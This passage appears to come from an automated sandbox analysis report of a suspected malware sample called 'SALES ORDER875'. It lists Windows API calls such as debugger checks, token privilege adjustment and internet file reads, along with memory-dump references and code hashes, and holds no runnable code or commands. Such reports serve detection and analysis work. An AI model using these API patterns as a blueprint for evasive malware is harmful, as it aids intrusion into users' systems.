                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,?,00451270,000000FF,?,0000003F,?,?,?,0045121C,000000FF,?,0000003F,?,?), ref: 003BBC36
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 806657224-0
                                                                                                                                                                                    • Opcode ID: df9bc26e47adf05be655ed0454852dfd354ca018124036e3ec0c8a1794fb840b
                                                                                                                                                                                    • Instruction ID: 8978f7b3cdd46333414b65f56aeaf50d12ed38047bc256fe795eb722f4c916c6
                                                                                                                                                                                    • Opcode Fuzzy Hash: df9bc26e47adf05be655ed0454852dfd354ca018124036e3ec0c8a1794fb840b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E31E030944205EFCB12DF68CC80AADFBB8BF45314B1546AAF254EB6B2DB709E00CB54
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 003FCE89
                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 003FCEEA
                                                                                                                                                                                    • SetEvent.KERNEL32(?,?,00000000), ref: 003FCEFE
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorEventFileInternetLastRead
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 234945975-0
                                                                                                                                                                                    • Opcode ID: 3695d5ff19f799618eac4d1cdbcbef9192329beeccee0608796479ac9b47c63b
                                                                                                                                                                                    • Instruction ID: a96e47ddc05c1dbad375ced448ff484ec660b29c36dd72fee833330bdee80a53
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3695d5ff19f799618eac4d1cdbcbef9192329beeccee0608796479ac9b47c63b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7E21ED7198030D9BEB22CFA5CA88BB6B7FCEF10305F11842EE642D2151E774EE048B64
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,003C5222), ref: 003EDBCE
                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 003EDBDD
                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 003EDBEE
                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 003EDBFA
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2695905019-0
                                                                                                                                                                                    • Opcode ID: e734922b35a570851b778dd6d3d7e20f439a912cbeb161283102e0b6042878a7
                                                                                                                                                                                    • Instruction ID: 72cc33f81a31bf77e75fbbf1e1b1b09f0ab16ca25fb2d9395f8447732e3b180b
                                                                                                                                                                                    • Opcode Fuzzy Hash: e734922b35a570851b778dd6d3d7e20f439a912cbeb161283102e0b6042878a7
                                                                                                                                                                                    • Instruction Fuzzy Hash: C9F0E5308509206782216B7CBC4D9EA376C9E01374B248752F836C20F0EBB05D64C6DA
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 003F5CC1
                                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 003F5D17
                                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 003F5D5F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Find$File$CloseFirstNext
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3541575487-0
                                                                                                                                                                                    • Opcode ID: 36b66953ccc4444a4b2a48a4c4f1931a93339635541daf16073bd08db204faeb
                                                                                                                                                                                    • Instruction ID: 6cbaa5a08b222e29038c17cdc70ea5410dd157ef1b74c68c832155c6a671f205
                                                                                                                                                                                    • Opcode Fuzzy Hash: 36b66953ccc4444a4b2a48a4c4f1931a93339635541daf16073bd08db204faeb
                                                                                                                                                                                    • Instruction Fuzzy Hash: A2519A34604B059FC715DF28C494AA6B7E4FF0A314F14859EFA5A8B3A1CB30EC04CB91
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 003B271A
                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 003B2724
                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 003B2731
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3906539128-0
                                                                                                                                                                                    • Opcode ID: cfc597b6eabedd8dbb63d8f7c57125ed5a9c73f77800dd808679cb8a2963e40f
                                                                                                                                                                                    • Instruction ID: 62780851cfac18145630d2bbc58b96e10ef86ebf0993cf38148e92225112119f
                                                                                                                                                                                    • Opcode Fuzzy Hash: cfc597b6eabedd8dbb63d8f7c57125ed5a9c73f77800dd808679cb8a2963e40f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2B31C47494121C9BCB26DF68DC897D9B7B8EF08310F5042EAE81CA6261EB709F818F44
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 003F51DA
                                                                                                                                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 003F5238
                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000000), ref: 003F52A1
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorMode$DiskFreeSpace
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1682464887-0
                                                                                                                                                                                    • Opcode ID: c44a014a5d96604998ce3b743502046ce29465209203d03fc405244f5005aa8a
                                                                                                                                                                                    • Instruction ID: b4f28fe011d2a94dc5365223ad7dd1d13c1c675b77e9ca8a8efbbbf85c54d7db
                                                                                                                                                                                    • Opcode Fuzzy Hash: c44a014a5d96604998ce3b743502046ce29465209203d03fc405244f5005aa8a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 26317F35A00618EFDB01DF54D884EADBBB4FF09314F158099E905AF352CB31E845CBA0
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0039FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 003A0668
                                                                                                                                                                                      • Part of subcall function 0039FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 003A0685
                                                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003E170D
                                                                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 003E173A
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 003E174A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 577356006-0
                                                                                                                                                                                    • Opcode ID: 50df0c3fb04a0f7fb750699b1010e9f6aeba4ebf4ff75c291cf32e43c8091a38
                                                                                                                                                                                    • Instruction ID: 3c044a599b737da36baef46eda1e88a8f4eb4680ccd44fce1b86a786b4b7b8d4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 50df0c3fb04a0f7fb750699b1010e9f6aeba4ebf4ff75c291cf32e43c8091a38
                                                                                                                                                                                    • Instruction Fuzzy Hash: E911C1B2410304AFD7189F54DCC6DAABBBDEF04714B20852EE45697681EB70BC41CA64
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 003ED608
                                                                                                                                                                                    • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 003ED645
                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 003ED650
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 33631002-0
                                                                                                                                                                                    • Opcode ID: 75035dddece90f540948b0d1bea8e7750e2d15ff4c8a130559954df4c6f41174
                                                                                                                                                                                    • Instruction ID: 55bc34f1cb1d3c64d26b780bf479fbb85e2a5cfd01e911e4d8b2930205b059ab
                                                                                                                                                                                    • Opcode Fuzzy Hash: 75035dddece90f540948b0d1bea8e7750e2d15ff4c8a130559954df4c6f41174
                                                                                                                                                                                    • Instruction Fuzzy Hash: 38118E71E41228BFDB108F95DC84FEFBBBCEB45B50F108121F914E7290C2704A018BA1
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 003E168C
                                                                                                                                                                                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 003E16A1
                                                                                                                                                                                    • FreeSid.ADVAPI32(?), ref: 003E16B1
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3429775523-0
                                                                                                                                                                                    • Opcode ID: e1aa813248c093181100c77d731ac9bdd716c0c78e7cd5d0c575419ebec42e72
                                                                                                                                                                                    • Instruction ID: aaa1166dddf4fabf6b537f77a600ad96e3105392cdf715dec3b5fa9818271c13
                                                                                                                                                                                    • Opcode Fuzzy Hash: e1aa813248c093181100c77d731ac9bdd716c0c78e7cd5d0c575419ebec42e72
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8BF0F471990309FBDB00DFE49C89EAEBBBCEB08604F508565E901E2181E774AA448A54
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(003B28E9,?,003A4CBE,003B28E9,004488B8,0000000C,003A4E15,003B28E9,00000002,00000000,?,003B28E9), ref: 003A4D09
                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,003A4CBE,003B28E9,004488B8,0000000C,003A4E15,003B28E9,00000002,00000000,?,003B28E9), ref: 003A4D10
                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 003A4D22
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1703294689-0
                                                                                                                                                                                    • Opcode ID: 2d99dd5721c4a3dcd309037f8dfef7a5ef95423a4c58d72ae647771fded64f09
                                                                                                                                                                                    • Instruction ID: 76314bef7306a6a8090bbba7b69127f06c2c40340d53057603dda015336cb32c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2d99dd5721c4a3dcd309037f8dfef7a5ef95423a4c58d72ae647771fded64f09
                                                                                                                                                                                    • Instruction Fuzzy Hash: F9E0B631040148ABCF12AF54DD89A987B69EB82785B118024FD158A523DB75DE42CA84
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetUserNameW.ADVAPI32(?,?), ref: 003DD28C
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: NameUser
                                                                                                                                                                                    • String ID: X64
                                                                                                                                                                                    • API String ID: 2645101109-893830106
                                                                                                                                                                                    • Opcode ID: 09f16d1ab8d746d62f1cd4ed54dbcfbe770bdcee79d2fb19111d688d9e511a78
                                                                                                                                                                                    • Instruction ID: 9ecfcca44068d4a384aadf6503b86ce8b2b2dbd6515b3da82f09a2be9ccbbf48
                                                                                                                                                                                    • Opcode Fuzzy Hash: 09f16d1ab8d746d62f1cd4ed54dbcfbe770bdcee79d2fb19111d688d9e511a78
                                                                                                                                                                                    • Instruction Fuzzy Hash: B6D0CAB584122DEACF95CBA0ECC8DDAB7BCBB08345F1046A2F146A2600DB3096488F20
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                                                                                                                    • Instruction ID: c0f8991020883104f2fd7769ed1e5992cc94cc0897ea5e4860c1e58ed736942e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                                                                                                                    • Instruction Fuzzy Hash: EF022C71E102199FDF15CFA9C8806ADFBF1EF49324F25816AD819EB384D731AE418B90
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: Variable is not of type 'Object'.$p#E
                                                                                                                                                                                    • API String ID: 0-1466237490
                                                                                                                                                                                    • Opcode ID: 3a4cdb631c039001d90e0e7338668e3ae9043955a749c736df826182618b9cee
                                                                                                                                                                                    • Instruction ID: 1cf81659139487b254748e1697ad87aa4d9331b4758327ddb03d41f9b46ef39f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3a4cdb631c039001d90e0e7338668e3ae9043955a749c736df826182618b9cee
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1732AF71910308DBDF1AEF90D881BEDB7B9BF05704F10409AE806AB282D775AE49CB60
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 003F6918
                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 003F6961
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2295610775-0
                                                                                                                                                                                    • Opcode ID: 3727773b2a4095d7c2dad22acdb30bb4fbfd12de3d06fd742ee592a032b5fdce
                                                                                                                                                                                    • Instruction ID: d1b4f87c09e5b99df4c2e1664b4a81a0441734e231db840719474aaa4dcb35a9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3727773b2a4095d7c2dad22acdb30bb4fbfd12de3d06fd742ee592a032b5fdce
                                                                                                                                                                                    • Instruction Fuzzy Hash: C211D0316042009FD710DF29D885A26BBE5FF85328F15C6A9E5698F6A2C770EC05CB90
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00404891,?,?,00000035,?), ref: 003F37E4
                                                                                                                                                                                    • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00404891,?,?,00000035,?), ref: 003F37F4
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorFormatLastMessage
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3479602957-0
                                                                                                                                                                                    • Opcode ID: 8f773cc989f07c7259265f04756063c402f3b0d98880d8bc1c89e65a219efce5
                                                                                                                                                                                    • Instruction ID: 60a59f51fe7d2dfdd77ea7745767ae4bd090a9c79fd748899f6fc91fbd888382
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8f773cc989f07c7259265f04756063c402f3b0d98880d8bc1c89e65a219efce5
                                                                                                                                                                                    • Instruction Fuzzy Hash: E4F0E5B06453282AE72127669C8DFEB3AAEEFC5761F000275F609D2281D9A09D44C7B0
                                                                                                                                                                                    APIs
